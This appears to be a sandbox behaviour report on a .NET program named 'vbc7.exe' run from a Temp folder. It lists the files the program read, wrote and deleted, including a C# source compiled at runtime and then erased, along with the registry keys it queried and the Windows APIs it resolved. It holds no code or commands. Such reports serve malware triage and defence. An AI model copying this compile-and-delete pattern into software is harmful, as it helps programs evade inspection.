C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp
C:\Windows\System32\tzres.dll
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe.config
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp
C:\Windows\System32\tzres.dll
C:\Windows\SysWOW64\ntdll.dll

Write Files

C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.tmp
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.0.cs
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.out
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.err
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp

Delete Files

C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.0.cs
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.pdb
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.out
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.err
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.tmp
C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbc7.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\vbc7.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F570307C
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F570307C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
